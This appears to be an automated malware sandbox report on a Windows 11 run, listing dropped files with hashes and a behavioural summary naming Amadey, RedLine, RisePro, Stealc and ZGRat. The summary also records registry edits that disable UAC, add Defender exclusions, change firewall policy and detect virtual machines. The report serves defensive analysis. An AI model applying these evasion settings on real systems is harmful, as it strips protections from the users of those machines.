memory/5312-214-0x00000000734F0000-0x0000000073CA0000-memory.dmp
memory/5312-215-0x0000000000EC0000-0x0000000000F12000-memory.dmp
memory/224-218-0x00000000009A0000-0x0000000000E5E000-memory.dmp
memory/5716-219-0x0000000000400000-0x000000000044C000-memory.dmp
memory/5716-222-0x0000000000400000-0x000000000044C000-memory.dmp
memory/5312-225-0x0000000003410000-0x0000000005410000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
| MD5 | 31841361be1f3dc6c2ce7756b490bf0f |
| SHA1 | ff2506641a401ac999f5870769f50b7326f7e4eb |
| SHA256 | 222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee |
| SHA512 | 53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019 |
memory/5980-244-0x0000000000400000-0x0000000000592000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
| MD5 | b22521fb370921bb5d69bf8deecce59e |
| SHA1 | 3d4486b206e8aaac14a3cf201c5ac152a2a7d4ea |
| SHA256 | b30d10e292f89f4d288839974f71f6b703d6d9a9ae698ea172a2b64364e77158 |
| SHA512 | 1f7d64ba5266314ed18f577f0984706c21f4f48e8cdb069130e4435c2bcdf219f8dd27e4d3bf3a373f4db4c01e30efe8d7f4d87f4d8cbbbeaf9c7043f685994c |
memory/4660-268-0x0000000000660000-0x0000000000C4B000-memory.dmp
memory/5304-279-0x0000000000400000-0x000000000044E000-memory.dmp
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
| MD5 | 0c582da789c91878ab2f1b12d7461496 |
| SHA1 | 238bd2408f484dd13113889792d6e46d6b41c5ba |
| SHA256 | a6ab532816fbb0c9664c708746db35287aaa85cbb417bef2eafcd9f5eaf7cf67 |
| SHA512 | a1b7c5c13462a7704ea2aea5025d1cb16ddd622fe1e2de3bbe08337c271a4dc8b9be2eae58a4896a7df3ad44823675384dbc60bdc737c54b173909be7a0a086a |
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
| MD5 | 20ae0bb07ba77cb3748aa63b6eb51afb |
| SHA1 | 87c468dc8f3d90a63833d36e4c900fa88d505c6d |
| SHA256 | daf6ae706fc78595f0d386817a0f8a3a7eb4ec8613219382b1cbaa7089418e7d |
| SHA512 | db315e00ce2b2d5a05cb69541ee45aade4332e424c4955a79d2b7261ab7bd739f02dc688224f031a7a030c92fa915d029538e236dbd3c28b8d07d1265a52e5b2 |
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
| MD5 | 0099a99f5ffb3c3ae78af0084136fab3 |
| SHA1 | 0205a065728a9ec1133e8a372b1e3864df776e8c |
| SHA256 | 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226 |
| SHA512 | 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6 |
memory/5920-303-0x0000000000C70000-0x000000000114E000-memory.dmp
memory/5304-291-0x0000000000400000-0x000000000044E000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | a9318c17ef6a0b637aa3494a517565da |
| SHA1 | 6ef8df61a2e5446899d72a892ff187fa6d705ba7 |
| SHA256 | bfbef1a74342bb67f7cd2ecc923dbf7c291b76a935e9a21ac1bf5ec835361441 |
| SHA512 | 36ced61b159881526542d64d7bcf45e0535452481b816cba46b4f45cafb8db0cdd7685847b81e9f47daa1e25274eec03fc1ff2af847aa54eb169652ad82eac37 |
C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll
| MD5 | f35b671fda2603ec30ace10946f11a90 |
| SHA1 | 059ad6b06559d4db581b1879e709f32f80850872 |
| SHA256 | 83e3df5bec15d5333935bea8b719a6d677e2fb3dc1cf9e18e7b82fd0438285c7 |
| SHA512 | b5fa27d08c64727cef7fdda5e68054a4359cd697df50d70d1d90da583195959a139066a6214531bbc5f20cd4f9bc1ca3e4244396547381291a6a1d2df9cf8705 |
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
| MD5 | 8510bcf5bc264c70180abe78298e4d5b |
| SHA1 | 2c3a2a85d129b0d750ed146d1d4e4d6274623e28 |
| SHA256 | 096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6 |
| SHA512 | 5ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d |
C:\Users\Admin\AppData\Local\Temp\TmpB35D.tmp
| MD5 | 1420d30f964eac2c85b2ccfe968eebce |
| SHA1 | bdf9a6876578a3e38079c4f8cf5d6c79687ad750 |
| SHA256 | f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9 |
| SHA512 | 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3808065738-1666277613-1125846146-1000\76b53b3ec448f7ccdda2063b15d2bfc3_2397ee06-28fe-4eaa-8777-f7014368c353
| MD5 | 8da8c571aaaffa96dc3bd768300be5af |
| SHA1 | 943a62c6dab0c7c4214329408859b3c2a981553b |
| SHA256 | a0aa009ba44b0f5d7ed63fe009a53015e950269d517d1f2b1cfd65d98c938bed |
| SHA512 | 648c34cab327644dcb6d548374c661d46a9e8a3ca94485f61f7042623f78d125a5ef1df5bf718d3527a25fbc9413284e9e767a8adb7ba50045bca9b3a531752b |
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
| MD5 | 586f7fecacd49adab650fae36e2db994 |
| SHA1 | 35d9fb512a8161ce867812633f0a43b042f9a5e6 |
| SHA256 | cf88d499c83da613ad5ccd8805822901bdc3a12eb9b15804aeff8c53dc05fc4e |
| SHA512 | a44a2c99d18509681505cf70a251baf2558030a8648d9c621acc72fafcb2f744e3ef664dfd0229baf7c78fb72e69f5d644c755ded4060dcafa7f711d70e94772 |
memory/224-418-0x00000000009A0000-0x0000000000E5E000-memory.dmp
C:\Users\Public\Desktop\Google Chrome.lnk
| MD5 | 52e3f38557bc84b7845f1e9914b60276 |
| SHA1 | 7f4d6ec636e5549e9b5e2b77c5efaa3d18dee03f |
| SHA256 | 974c64e7af9e27200b7c273e789c7061d22ac283f7b14ee94afe289651a182e0 |
| SHA512 | 8e92f4e0f001413684cad06b72b10c6de8f9582e5f954ec536d303d8cd1d61dc4a7a3be34bc6b09e85ec1a03002b0a70efdc95b4aa7d99dec93975986ced931b |
C:\Users\Admin\Desktop\Microsoft Edge.lnk
| MD5 | 0cecac204015466cbf913c1ba58c9447 |
| SHA1 | 36e3874f0245e5106c15f94a387bf5a0134ed963 |
| SHA256 | f68edc443fa6476c7bdafb8b7adb2d062a2d898a9960f0afd039cafe1eb3e28a |
| SHA512 | 1a54813ccc262eaafb0f48397d9ac7803b682f4aabe413f6628d1de94d0cce693c7f86986606d26380bace18d5a8deb104b3a181717541f8c1432029b70b1bb0 |
memory/5636-431-0x0000000000400000-0x000000000063B000-memory.dmp
memory/5636-436-0x0000000000400000-0x000000000063B000-memory.dmp
memory/4660-441-0x0000000000660000-0x0000000000C4B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe
| MD5 | 7fabf15848c951f6665ec449c8c77098 |
| SHA1 | f9ef6114a8e2d3838d0cadd4a71d6baf95e133cf |
| SHA256 | a440e88b2c1d1746b82ffaadaef0571a14f3d76dbabba87b0c3de6ac5eff2f35 |
| SHA512 | 4e8b84b13bf04befb12d2f1b2f36a1a7285be640315c1a8eb61137f77ca2202b62892d95fee02debaa75ca3b5d782a5d0a7a08a010206929187504a91e9ddb0a |
memory/5920-466-0x0000000000C70000-0x000000000114E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1oojsvc4.pf1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe
| MD5 | 6184676075afacb9103ae8cbf542c1ed |
| SHA1 | bc757642ad2fcfd6d1da79c0754323cdc823a937 |
| SHA256 | a0b0b39b69005a2d39a8b8271a3518aa0a55148b794d2b4995b3c87ed183b23b |
| SHA512 | 861ac361b585a069f2274b577b30f2a13baf72a60acd4f22da41885aee92c3975445150822f1072590d7b574ff54eb3abde6a6c4f800988ab9ff4344884f41fa |
memory/5636-496-0x0000000061E00000-0x0000000061EF3000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
| MD5 | fc5414b1f68304b956a6bc0ef56db142 |
| SHA1 | 75b730cbf5120cf3cb1980faa0376e362f2112c7 |
| SHA256 | 7e04ff3cb23fd3d98299400b4a9e2099c75e169177d0d6800d9ea07e114c9c85 |
| SHA512 | c4c271e39c65cbefa279c7a0a5dc52865f613c2d0e475c8ccc9ccf74b74f53a26ff977e8795fe1b20a68dd1d48013db1370b6cbf012dc9a3ebd55ad15a185c5e |
C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll
| MD5 | 154c3f1334dd435f562672f2664fea6b |
| SHA1 | 51dd25e2ba98b8546de163b8f26e2972a90c2c79 |
| SHA256 | 5f431129f97f3d56929f1e5584819e091bd6c854d7e18503074737fc6d79e33f |
| SHA512 | 1bca69bbcdb7ecd418769e9d4befc458f9f8e3cee81feb7316bb61e189e2904f4431e4cc7d291e179a5dec441b959d428d8e433f579036f763bbad6460222841 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History
| MD5 | a410a207649336d9502b77f949f9497e |
| SHA1 | 3b5e2081447d7a55dc555d1b38a8239f8f60420a |
| SHA256 | 509540d3bc0cd4e265a197709ce295868e1294caf03c96e7b62116b77460a746 |
| SHA512 | 4c98bcd6a85fff2a3f3b4ee4d9020bc1ed4e61af18ba291b061c1151200ff47f6cb7b42d1bea09a06835da13810106654f231b0d7fb49f519e252dc76f80382e |
memory/932-562-0x0000000000400000-0x0000000000408000-memory.dmp
memory/224-566-0x00000000009A0000-0x0000000000E5E000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 79c427853b3831180059c4daf9ab4149 |
| SHA1 | fd810e3118e3cde1929c14bf1bc37202709c2082 |
| SHA256 | 01d1e806267b912a01a745e1594de6ab869ac6353b13ccde79a87b98111e0b64 |
| SHA512 | adea741fbf3476430b5736bbaa03437bf82b92fe0827cb8a58a65247fb632c1013bf41c71463c39a82e66bcfb12d7d32ed25d4e6322ff07c604e60276529b0c2 |
C:\Program Files (x86)\GameServerClient\installg.bat
| MD5 | b6b57c523f3733580d973f0f79d5c609 |
| SHA1 | 2cc30cfd66817274c84f71d46f60d9e578b7bf95 |
| SHA256 | d8d718641bdf39cca1a5db7bb52d3c66d400a97bef3cafdd81cd7e711a51c570 |
| SHA512 | d39440163592bc3b1cb7830f236a97d5819c10775e453637d5a04a981e9a336480c6b4701afdceba0d52dfe09413b7abe2ad58ff55b5057a26229f3ccdc3a7c7 |
C:\Users\Admin\Pictures\xHSgAbJbe94BQATl47X6pmCZ.exe
| MD5 | 5b423612b36cde7f2745455c5dd82577 |
| SHA1 | 0187c7c80743b44e9e0c193e993294e3b969cc3d |
| SHA256 | e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09 |
| SHA512 | c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c |
C:\Users\Admin\Pictures\K9EzU2hxB6e4QfvrMT7LnkFP.exe
| MD5 | dcc50ec1cc74d2f605b455885e781f40 |
| SHA1 | 594447e41168142a701dff4ce16182f50921a064 |
| SHA256 | bc67a67c9441eb9220a42bda0af159fa9ae2eefcfb83370d28157bed5436dea4 |
| SHA512 | 23422811b4c3ba39b9f4a44654e9547e6e42e8bbac857f02ce086686572860d9964674fc67d8a4020c4794f6bcf98311be51fd0f3dfc6b910bd4f118975886b5 |
C:\Program Files (x86)\GameServerClient\GameService.exe
| MD5 | d9ec6f3a3b2ac7cd5eef07bd86e3efbc |
| SHA1 | e1908caab6f938404af85a7df0f80f877a4d9ee6 |
| SHA256 | 472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c |
| SHA512 | 1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4 |
memory/4660-619-0x0000000000660000-0x0000000000C4B000-memory.dmp
memory/5920-620-0x0000000000C70000-0x000000000114E000-memory.dmp
C:\Users\Admin\Pictures\dvziYrHzjJaIGccJldIN1TNj.exe
| MD5 | 1675ad3eadb63a45bd70ef2832a9e961 |
| SHA1 | 3e8dee32889f96950b380c8bbdc2ec1d60b20aa6 |
| SHA256 | dc6ad8958e0b1b4f17911d19cb5bf4ac897383c575dfee9a3ab95d1c009c6248 |
| SHA512 | 00ef6585174b73f3b8b73541a289a797b6aa71b5f3aaff1a5eb376f9c83655fc599bd3e4c541bd0c6bbd0de222d2684bc6fc77c28335f6874acd42180901f2bd |
C:\Users\Admin\AppData\Local\Temp\tmp2C7.tmp
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA1 | 84f98b56d49f01e9b6b76a4e21accf64fd319140 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
| SHA512 | 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac |
memory/224-668-0x00000000009A0000-0x0000000000E5E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp52A.tmp
| MD5 | 4c2e2189b87f507edc2e72d7d55583a0 |
| SHA1 | 1f06e340f76d41ea0d1e8560acd380a901b2a5bd |
| SHA256 | 99a5f8dea08b5cf512ed888b3e533cc77c08dc644078793dc870abd8828c1bca |
| SHA512 | 8b6b49e55afe8a697aaf71d975fab9e906143339827f75a57876a540d0d7b9e3cbbcdd8b5435d6198900a73895cc52d2082e66ee8cec342e72f2e427dde71600 |
C:\Users\Admin\AppData\Local\Temp\tmp817.tmp
| MD5 | d444c807029c83b8a892ac0c4971f955 |
| SHA1 | fa58ce7588513519dc8fed939b26b05dc25e53b5 |
| SHA256 | 8297a7698f19bb81539a18363db100c55e357fa73f773c2b883d2c4161f6a259 |
| SHA512 | b7958b843639d4223bef65cdc6c664d7d15b76ac4e0a8b1575201dd47a32899feff32389dcc047314f47944ebe7b774cd59e51d49202f49541bbd70ecbb31a2e |
C:\Users\Admin\AppData\Local\Temp\tmp8B6.tmp
| MD5 | 485905d27532ac3aa5e05dee8c7c00ae |
| SHA1 | 0dda0f58edb73efeb09fd983c62e75babd67f070 |
| SHA256 | a5696756dfd836fc8ac1923d8ba964a084e6ad9508169499449dbd755828ae03 |
| SHA512 | cafeb4036421c0ed67e87e4b1ef10e953d528681d3d1c2ea7da0724100c6d3c1d4f02ff71293b880ce5a5008989ae9c9b83dea5d20557397c521017866b47990 |
memory/6608-736-0x0000000000400000-0x0000000002C4D000-memory.dmp
memory/4660-753-0x0000000000660000-0x0000000000C4B000-memory.dmp
memory/5920-754-0x0000000000C70000-0x000000000114E000-memory.dmp
C:\Users\Public\Desktop\Google Chrome.lnk
| MD5 | 1aa4c8a8b942fc6bcb48eb0074a8115a |
| SHA1 | 9fd64716658829032a272d64fba6b5b0fcc2faff |
| SHA256 | bde42a06c4b56700c437c20f3c8559ebbecb8470eb13f67ea0654e69c62441e4 |
| SHA512 | d14ff2c99de25c3cf0398892a1a5c34cf97a2a301c6d8391b14925f9d6105c3d0e25e4e19788db336d75a36b7274e6761beeebbda66ec0ada40f060e2d25afa3 |
C:\Users\Admin\Desktop\Microsoft Edge.lnk
| MD5 | 793c97e2e79e1faa21b88ddefc3f151f |
| SHA1 | af5ce928eb10a69a5b90d5b528c80dc7492ba63a |
| SHA256 | 109ab82bea0c37f1010240e1fec0fdfb812b28dc64d4c931710ae9ce87ae42c0 |
| SHA512 | 966a58f26d51775995b0370641b1120cc8c00221d4e552c4a247f68d0e9099022745d93806f9251c86cc437399d8c451c03c8e830deeb5fac01d957b7a48c371 |
memory/7008-777-0x0000000000400000-0x000000000300B000-memory.dmp
memory/7068-781-0x0000000000400000-0x000000000300B000-memory.dmp
memory/224-783-0x00000000009A0000-0x0000000000E5E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u53k.0.exe
| MD5 | ce973cd51fa98b694da3eff7cc2f18a4 |
| SHA1 | 8288ebe7f7d07075208160212d240aee5cdc1ad3 |
| SHA256 | 543281e6bc99b7e20ce3719d1fb2d3a8d34d62fd5153d233022c42ee1cc48ed7 |
| SHA512 | 16ec39ed84b8edfaec9fdfb362686ab8008bbf0d6dbaf03dd16d8b9d59faae76a757758c0edf3264e3adeae791c199db15eebcc4c09848923c2e738661befb2d |
memory/4660-799-0x0000000000660000-0x0000000000C4B000-memory.dmp
memory/6608-800-0x0000000000400000-0x0000000002C4D000-memory.dmp
memory/5920-802-0x0000000000C70000-0x000000000114E000-memory.dmp
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\Users\Admin\AppData\Local\Temp\u53k.1.zip
| MD5 | 78d3ca6355c93c72b494bb6a498bf639 |
| SHA1 | 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e |
| SHA256 | a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001 |
| SHA512 | 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea |
memory/7008-814-0x0000000000400000-0x000000000300B000-memory.dmp
memory/7068-843-0x0000000000400000-0x000000000300B000-memory.dmp
memory/224-845-0x00000000009A0000-0x0000000000E5E000-memory.dmp
C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe
| MD5 | 798765f0771dd2d5c8d0f7bb5aedd6cf |
| SHA1 | bf9fcd00b8cb316244fc9f57117a3548afc765ea |
| SHA256 | 6046daa6cd975c5d43794c30ddedf28b3631eb78a183ee8c8c7fd49aba2e2bce |
| SHA512 | 594fa294f0344d9932f6ce8e7afad35673ef59882eeffc78b0554f860866e5f48043b9250a2e1905eb0f3e55053f90154c0a800c0ef5f27a661de2c15af5d7d3 |
C:\Users\Admin\Pictures\AUOJwzWUhuXoDRZSwm4I8Gsd.exe
| MD5 | 69f6614893028c60394f744c7ebc1551 |
| SHA1 | ccd4a9f86876ddbfe2bc86a2b17a4cbc1857b1dd |
| SHA256 | b96a4de2d4f97380388b6b515e8cdef28a92f358a7d487be3463828303d8661d |
| SHA512 | 4a40bcf25303accf93bb15e281a53ee0cda93c1f7c1ede741338b8080daa0a61c6751c5d11ed8ceeec520782913f748298b5016565a31f47c980d8e868461855 |
C:\Users\Admin\AppData\Local\Temp\u53k.2\run.exe
| MD5 | 9fb4770ced09aae3b437c1c6eb6d7334 |
| SHA1 | fe54b31b0db8665aa5b22bed147e8295afc88a03 |
| SHA256 | a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3 |
| SHA512 | 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256 |
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2404251441588842212.dll
| MD5 | 45fe60d943ad11601067bc2840cc01be |
| SHA1 | 911d70a6aad7c10b52789c0312c5528556a2d609 |
| SHA256 | 0715f9558363b04526499fcd6abf0b1946950af0a7f046a25f06b20dddb67add |
| SHA512 | 30c82f6b329fefa5f09a5974c36b70ea2bdab273e7d6eadd456fddcc2aa693f8f1cf096d57c3719d1106e9f85d50a4ffbf0ed7e66da2da0a5f23b6ee8c7194ba |
memory/5796-950-0x000000006B9E0000-0x000000006BB5B000-memory.dmp
memory/5920-958-0x0000000000C70000-0x000000000114E000-memory.dmp
memory/4660-948-0x0000000000660000-0x0000000000C4B000-memory.dmp
memory/5796-960-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
C:\Users\Admin\AppData\Local\Temp\u53k.3.exe
| MD5 | 397926927bca55be4a77839b1c44de6e |
| SHA1 | e10f3434ef3021c399dbba047832f02b3c898dbd |
| SHA256 | 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7 |
| SHA512 | cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954 |
memory/6608-959-0x0000000000400000-0x0000000002C4D000-memory.dmp
C:\Users\Admin\Pictures\qljIlML54xtrmsfmXnFGGOr1.exe
| MD5 | d981fb3fc1f28bea729db051c75dae08 |
| SHA1 | d5eea12045a6d998da1a362f70748fc09874d0b4 |
| SHA256 | aa5689332012817778e4ef3602e918297c567c4d573b463f86e8d98fef2eb48f |
| SHA512 | a93576bc04ac5b1ba129913c3d4e5100cf7f0f8bd7a4c9a21ce3af645624890006e087eefa5d0cbd804b7b96ebc13cf32a722b8c1d66d409879f41d5bfa974cb |
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | 4625a82e94e6a4781128479c369701ec |
| SHA1 | 9612a2a6ffb31827d4e0d2c8f026a9f0f73a3a65 |
| SHA256 | 757b5bb33f706c46e55f5412fec06a56a971daef7beb480f6c7c57480cd845c7 |
| SHA512 | 62ddae0aef1de67269b2c0f10811a736a9c321466aae53d098fa192733a4b2d3b9381805fe421ed21f8a94a68a2709c81a68d12c8250747a1518d4672b1754e4 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441591\opera_package
| MD5 | dbc1d326dc78baf7eb5026e3a1821c72 |
| SHA1 | d0dd891a6eae99513cfdd0d3b40a95b76fbe72bc |
| SHA256 | acb6b3b9c62705efcde5c5fc48f7fd67820a72e90d88dc4fa628a31c2eb91702 |
| SHA512 | e03e69e20398b53a61538d714f3b1bf1ff3723eb94f84c6dee6f4e788ca3be7a10ef3525b426df02158bac6cf371104ae0a64b2248bd6f1092fc4c698b2adfc5 |
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | 5ab821a9d9ee07e2b43a09adf4179717 |
| SHA1 | bda8268438f93971b8e2ca4fccc8dbc91d740ba2 |
| SHA256 | 16e26b1e15c11ad5f6419db4417fbf8c43c1f99c9687b09834714f5ebef14b60 |
| SHA512 | a7396c1f978b4ca9fffee697871df32d2857f2e1da2c579c69ae0fb6d233aa994c76bf581524662f8460f119e96368deb809d9be5674fecac45fd13f5bd24395 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441591\additional_file0.tmp
| MD5 | 15d8c8f36cef095a67d156969ecdb896 |
| SHA1 | a1435deb5866cd341c09e56b65cdda33620fcc95 |
| SHA256 | 1521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8 |
| SHA512 | d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a |
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-25 14:40
Reported
2024-04-25 14:42
Platform
win11-20240412-en
Max time kernel
111s
Max time network
151s
Command Line
Signatures
Amadey
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
Stealc
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000014001\7d41195f4d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000014001\7d41195f4d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000014001\7d41195f4d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
